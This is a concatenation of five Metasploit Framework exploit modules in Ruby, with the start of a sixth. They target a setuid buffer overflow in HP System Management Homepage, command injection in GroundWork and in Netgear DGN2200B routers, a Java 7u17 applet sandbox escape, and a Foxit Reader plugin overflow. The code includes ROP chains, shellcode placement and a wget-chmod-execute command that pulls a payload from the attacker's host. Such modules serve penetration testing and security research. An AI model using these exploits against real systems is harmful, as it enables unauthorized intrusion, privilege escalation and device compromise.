##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
 
class Metasploit4 < Msf::Exploit::Local
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common
 
  include Msf::Exploit::Local::Linux
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'HP System Management Homepage Local Privilege Escalation',
        'Description'   => %q{
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root
          smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
          env variable.
        },
        'License'       => MSF_LICENSE,
        'Author'        =>
          [
            'agix' # @agixid # Vulnerability discovery and Metasploit module
          ],
        'Platform'      => [ 'linux' ],
        'Arch'          => [ ARCH_X86 ],
        'SessionTypes'  => [ 'shell' ],
        'Payload'    =>
          {
            'Space'     => 227,
            'BadChars'   => "\x00\x22"
          },
        'References'    =>
          [
            ['OSVDB', '91990']
          ],
        'Targets'       =>
          [
            [ 'HP System Management Homepage 7.1.1',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c86eb, # call esp
                'Offset' => 58
              }
            ],
            [ 'HP System Management Homepage 7.1.2',
              {
                'Arch' => ARCH_X86,
                'CallEsp' => 0x080c8b9b, # call esp
                'Offset' => 58
              }
            ],
          ],
        'DefaultOptions' =>
          {
            'PrependSetuid'    => true
          },
        'DefaultTarget' => 0,
        'DisclosureDate' => "Mar 30 2013",
      }
      ))
    register_options([
        OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
      ], self.class)
  end
 
  def exploit
    pl = payload.encoded
    padding = rand_text_alpha(target['Offset'])
    ret = [target['CallEsp']].pack('V')
    exploit =  pl
    exploit << ret
    exploit << "\x81\xc4\x11\xff\xff\xff"   # add esp, 0xffffff11
    exploit << "\xe9\x0e\xff\xff\xff"    # jmp => begining of pl
    exploit << padding
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
    id=cmd_exec("id -un")
    if id!="hpsmh"
      fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
    end
    cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
    cmd_exec("#{datastore['smhstartDir']}/smhstart")
  end
 
end

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "GroundWork monarch_scan.cgi OS Command Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in GroundWork 6.7.0. This software
        is used for network, application and cloud monitoring. The vulnerability exists in
        the monarch_scan.cgi, where user controlled input is used in the perl qx function,
        which allows any remote authenticated attacker, whatever his privileges are, to
        inject system commands and gain arbitrary code execution. The module has been tested
        successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04
        based VM appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Johannes Greil', # Vulnerability Discovery, PoC
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '91051' ],
          [ 'US-CERT-VU', '345260' ],
          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
        ],
      'Arch'            => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 8190,
          'DisableNops' => true,
          'Compat'          =>
            {
              'PayloadType' => 'cmd'
            },
          # Based on the default Ubuntu 10.04 VM appliance
          'RequiredCmd' => 'generic telnet netcat perl python'
        },
      'Platform'       => ['unix', 'linux'],
      'Targets'        =>
        [
          ['GroundWork 6.7.0', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 8 2013",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('USERNAME',  [true, 'GroundWork Username', 'user']),
          OptString.new('PASSWORD',  [true, 'GroundWork Password', 'user'])
        ], self.class)
  end
 
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("josso", "signon", "login.do")
    })
 
    if res and res.body =~ /GroundWork.*6\.7\.0/
      return Exploit::CheckCode::Appears
    elsif res and res.body =~ /GroundWork/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end
 
  def get_josso_token
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),
      'vars_post' => {
        'josso_cmd'      => 'login',
        'josso_username' => datastore['USERNAME'],
        'josso_password' => datastore['PASSWORD']
      }
    })
    if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
      return $1
    else
      return nil
    end
  end
 
  def execute_command(command)
    http_handler = ((datastore['SSL']) ? "https" : "http")
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri("monarch", "monarch_scan.cgi"),
      'headers'   =>
        {
          'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"
        },
      'cookie'    => "JOSSO_SESSIONID=#{@josso_id}",
      'query'     => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"
    })
    return res
  end
 
  def exploit
    peer = "#{rhost}:#{rport}"
 
    print_status("#{peer} - Attempting to login...")
    @josso_id = get_josso_token
    if @josso_id.nil?
      fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")
    end
    print_good("#{peer} - Authentication successful")
 
    print_status("#{peer} - Sending malicious request...")
    execute_command(payload.encoded)
  end
end

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
 
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })
 
  def initialize( info = {} )
 
    super( update_info( info,
      'Name'          => 'Java Applet Reflection Type Confusion Remote Code Execution',
      'Description'   => %q{
          This module abuses Java Reflection to generate a Type Confusion, due to a weak
        access control when setting final fields on static classes, and run code outside of
        the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
        exploit doesn't bypass click-to-play, so the user must accept the java warning in
        order to run the malicious applet.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Jeroen Frijters', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end
 
 
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union1.class")
    @union1_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union2.class")
    @union2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "SystemClass.class")
    @system_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
 
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end
 
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")
 
    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("Union1.class", @union1_class)
      jar.add_file("Union2.class", @union2_class)
      jar.add_file("SystemClass.class", @system_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest
 
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
 
  end
 
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
 
end

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Netgear DGN2200B pppoe.cgi Remote Command Execution',
      'Description' => %q{
          Some Netgear Routers are vulnerable to an authenticated OS command injection
        on their web interface. Default credentials for the web interface are admin/admin
        or admin/password. Since it is a blind os command injection vulnerability, there
        is no output for the executed command when using the cmd generic payload. A ping
        command against a controlled system could be used for testing purposes. This module
        overwrites parts of the PPOE configuration, while the module tries to restore it
        after exploitation configuration backup is recommended.
      },
      'Author'      =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'BID', '57998' ],
          [ 'EDB', '24513' ],
          [ 'OSVDB', '90320' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-015' ]
        ],
      'DisclosureDate' => 'Feb 15 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsbe Payload',
            {
            'Arch' => ARCH_MIPSBE,
            'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1,
      ))
 
    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
        OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45])
      ], self.class)
  end
 
  def get_config(config, pattern)
    if config =~ /#{pattern}/
      #puts "[*] #{$1}"  #debugging
      return $1
    end
    return ""
  end
 
  def grab_config(user,pass)
    print_status("#{rhost}:#{rport} - Trying to download the original configuration")
    begin
      res = send_request_cgi({
        'uri'     => '/BAS_pppoe.htm',
        'method'  => 'GET',
        'authorization' => basic_auth(user,pass)
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if [200, 301, 302].include?(res.code)
        if res.body =~ /pppoe_username/
          print_good("#{rhost}:#{rport} - Successfully downloaded the configuration")
        else
          fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported")
        end
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
 
    @pppoe_username_orig = get_config(res.body, "<td\ align=\"right\"><input\ type=\"text\"\ name=\"pppoe_username\"\ size=\"15\"\ maxlength=\"63\"\ value=\"(.*)\"><\/td")
    @pppoe_passwd_orig = get_config(res.body, "<td\ align=\"right\"><input\ type=\"password\"\ name=\"pppoe_passwd\"\ size=\"15\"\ maxlength=\"63\"\ value=\"(.*)\"><\/td")
    @pppoe_servicename_orig = get_config(res.body, "<td\ align=\"right\"><input\ type=\"text\"\ name=\"pppoe_servicename\"\ maxlength=\"63\"\ size=\"15\"\ value=\"(.*)\"><\/td")
 
    @runtest_orig = get_config(res.body, "<input\ type=\"hidden\"\ name=\"runtest\"\ value=\"(.*)\">")
    @wan_ipaddr_orig = get_config(res.body, "<INPUT\ name=wan_ipaddr\ type=hidden\ value=\ \"(.*)\">")
    @pppoe_localip_orig = get_config(res.body, "<INPUT\ name=pppoe_localip\ type=hidden\ value=\ \"(.*)\">")
    @wan_dns_sel_orig = get_config(res.body, "<INPUT\ name=wan_dns_sel\ type=hidden\ value=\ \"(.*)\">")
    @wan_dns1_pri_orig = get_config(res.body, "<INPUT\ name=wan_dns1_pri\ type=hidden\ value=\ \"(.*)\">")
    @wan_dns1_sec_orig = get_config(res.body, "<INPUT\ name=wan_dns1_sec\ type=hidden\ value=\ \"(.*)\">")
    @wan_hwaddr_sel_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr_sel\ type=hidden\ value=\ \"(.*)\">")
    @wan_hwaddr_def_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr_def\ type=hidden\ value=\ \"(.*)\">")
    @wan_hwaddr2_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr2\ type=hidden\ value=\ \"(.*)\">")
    @wan_hwaddr_pc_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr_pc\ type=hidden\ value=\ \"(.*)\">")
    @wan_nat_orig = get_config(res.body, "<INPUT\ name=wan_nat\ type=hidden\ value=\ \"(.*)\">")
    @opendns_parental_ctrl_orig = get_config(res.body, "<INPUT\ name=opendns_parental_ctrl\ type=hidden\ value=\ \"(.*)\">")
    @pppoe_flet_sel_orig = get_config(res.body, "<INPUT\ name=pppoe_flet_sel\ type=hidden\ value=\ \"(.*)\">")
    @pppoe_flet_type_orig = get_config(res.body, "<INPUT\ name=pppoe_flet_type\ type=hidden\ value=\ \"(.*)\">")
    @pppoe_temp_orig = get_config(res.body, "<INPUT\ name=pppoe_temp\ type=hidden\ value=\ \"(.*)\">")
    @apply_orig = get_config(res.body, "<input\ type=\"SUBMIT\"\ name=\"apply\"\ value=(.*)\ onClick=\"return\ checkData\(\)\">")
  end
 
  def restore_conf(user,pass,uri)
    # we have used most parts of the original configuration
    # just need to restore pppoe_username
    cmd = @pppoe_username_orig
    print_status("#{rhost}:#{rport} - Asking the Netgear device to reload original configuration")
 
    res = request(cmd,user,pass,uri)
 
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration")
    end
 
    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)
  end
 
  def request(cmd,user,pass,uri)
    begin
 
    #original post request
    #login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20COMMAND%20%26
    #&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5
    #&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen
    #&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0
    #&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0
    #&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05
    #&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0
    #&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0
      res = send_request_cgi(
        {
          'uri'  => uri,
          'method' => 'POST',
          'authorization' => basic_auth(user,pass),
          'encode_params' => false,
          'vars_post' => {
            "login_type" => "PPPoE%28PPP+over+Ethernet%29",#default must be ok
            "pppoe_username" => cmd,
            "pppoe_passwd" => @pppoe_passwd_orig,
            "pppoe_servicename" => @pppoe_servicename_orig,
            "pppoe_dod" => "1",    #default must be ok
            "pppoe_idletime" => "5",  #default must be ok
            "WANAssign" => "Dynamic",  #default must be ok
            "DNSAssign" => "0",    #default must be ok
            "en_nat" => "1",    #default must be ok
            "MACAssign" => "0",    #default must be ok
            "apply" => @apply_orig,
            "runtest" => @runtest_orig,
            "wan_ipaddr" => @wan_ipaddr_orig,
            "pppoe_localip" => @pppoe_localip_orig,
            "wan_dns_sel" => @wan_dns_sel_orig,
            "wan_dns1_pri" => @wan_dns1_pri_orig,
            "wan_dns1_sec" => @wan_dns1_sec_orig,
            "wan_hwaddr_sel" => @wan_hwaddr_sel_orig,
            "wan_hwaddr_def" => @wan_hwaddr_def_orig,
            "wan_hwaddr2" => @wan_hwaddr2_orig,
            "wan_hwaddr_pc" => @wan_hwaddr_pc_orig,
            "wan_nat" => @wan_nat_orig,
            "opendns_parental_ctrl" => @opendns_parental_ctrl_orig,
            "pppoe_flet_sel" => @pppoe_flet_sel_orig,
            "pppoe_flet_type" => @pppoe_flet_type_orig,
            "pppoe_temp" => @pppoe_temp_orig,
            "opendns_parental_ctrl" => @opendns_parental_ctrl_orig
          }
        })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end
 
  def logout(user,pass)
    begin
      res = send_request_cgi({
        'uri'     => '/LGO_logout.htm',
        'method'  => 'GET',
        'authorization' => basic_auth(user,pass)
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful logout possible")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
 
  end
 
  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    uri = '/pppoe.cgi'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    @timeout = datastore['RELOAD_CONF_DELAY']
 
    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res = send_request_cgi({
        'uri'     => '/',
        'method'  => 'GET',
        'authorization' => basic_auth(user,pass)
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if [200, 301, 302].include?(res.code)
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end
 
    grab_config(user,pass)
 
    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      cmd = "%26%20#{cmd}%20%26"
      res = request(cmd,user,pass,uri)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end
 
    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false
 
    #
    # start our server
    #
    resource_uri = '/' + downfile
 
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
 
      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end
 
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})
 
      datastore['SSL'] = true if ssl_restore
    end
 
    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the Netgear device to download and execute #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)
 
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename};chmod 777 /tmp/#{filename};/tmp/#{filename}"
    cmd = Rex::Text.uri_encode(cmd)
    cmd = "%26%20#{cmd}%20%26"
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
 
    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")
 
    #
    #reload original configuration
    #
    restore_conf(user,pass,uri)
 
    #
    #lockout of the device and free the management sessions
    #
    logout(user,pass)
  end
 
  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end
 
  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
 
    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
 
end

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
	include Msf::Exploit::Remote::HttpServer::HTML
 
	Rank = NormalRanking
 
	def initialize(info={})
		super(update_info(info,
			'Name'           => "Foxit Reader Plugin URL Processing Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
					the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
					overly long query strings within URLs can cause a stack-based buffer overflow,
					which can be exploited to execute arbitrary code. This exploit has been tested
					on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
					(npFoxitReaderPlugin.dll version 2.2.1.530).
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'rgod <rgod[at]autistici.org>',       # initial discovery and poc
					'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
					'juan vazquez',                       # metasploit module
				],
			'References'     =>
				[
					[ 'OSVDB', '89030' ],
					[ 'BID', '57174' ],
					[ 'EDB', '23944' ],
					[ 'URL', 'http://retrogod.altervista.org/9sg_foxit_overflow.htm' ],
					[ 'URL', 'http://secunia.com/advisories/51733/' ]
				],
			'Payload'        =>
				{
					'Space'       => 2000,
					'DisableNops' => true
				},
			'DefaultOptions'  =>
				{
					'EXITFUNC' => "process",
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# npFoxitReaderPlugin.dll version 2.2.1.530
					[ 'Automatic', {} ],
					[ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
						{
							'Offset'          => 272,
							'Ret'             => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
							'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
							:rop => :win7_rop_chain
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jan 7 2013",
			'DefaultTarget'  => 0))
	end
 
	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'
 
		#Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
		firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''
 
		case nt
			when '5.1'
				os_name = 'Windows XP SP3'
			when '6.0'
				os_name = 'Windows Vista'
			when '6.1'
				os_name = 'Windows 7'
		end
 
		if os_name == 'Windows 7' and firefox =~ /18/
			return targets[1]
		end
 
		return nil
	end
 
	def junk
		return rand_text_alpha(4).unpack("L")[0].to_i
	end
 
	def nops
		make_nops(4).unpack("N*")
	end
 
	# Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
	def win7_rop_chain
 
		# rop chain generated with mona.py - www.corelan.be
		rop_gadgets =
			[
				0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
				0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
				0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
				0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
				0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
				0x41414141, # Filler (RETN offset compensation)
				0x1000614c, # & push esp # ret  [npFoxitReaderPlugin.dll]
				0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
				0x00001000, # 0x00001000-> edx
				0x1000d9ec, # XOR EDX, EDX # RETN
				0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
				junk,
				0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
				junk,
				junk,
				junk,
				0x41414141, # Filler (RETN offset compensation)
				0x00000040, # 0x00000040-> ecx
				0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
				0x00000001, # 0x00000001-> ebx
				0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
				0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
				0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
				nops,
				0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
			].flatten.pack("V*")
 
		return rop_gadgets
	end
 
	def on_request_uri(cli, request)
 
		agent = request.headers['User-Agent']
		my_target = get_target(agent)
 
		# Avoid the attack if no suitable target found
		if my_target.nil?
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end
 
		unless self.respond_to?(my_target[:rop])
			print_error("Invalid target specified: no callback function defined")
			send_not_found(cli)
			return
		end
 
		return if ((p = regenerate_payload(cli)) == nil)
 
		# we use two responses:
		# one for an HTTP 301 redirect and sending the payload
		# and one for sending the HTTP 200 OK with appropriate Content-Type
		if request.resource =~ /\.pdf$/
			# sending Content-Type
			resp = create_response(200, "OK")
			resp.body = ""
			resp['Content-Type'] = 'application/pdf'
			resp['Content-Length'] = rand_text_numeric(3,"0")
			cli.send_response(resp)
			return
		else
			resp = create_response(301, "Moved Permanently")
			resp.body = ""
 
			my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
			if datastore['SSL']
				schema = "https"
			else
				schema = "http"
			end
 
			sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
			sploit << [my_target.ret].pack("V") # EIP
			sploit << [my_target['WritableAddress']].pack("V") # Writable Address
			sploit << self.send(my_target[:rop])
			sploit << p.encoded
 
			resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
			cli.send_response(resp)
 
			# handle the payload
			handler(cli)
		end
	end
 
end

##
# This file is part of the Metasploit Framework and may be subject to
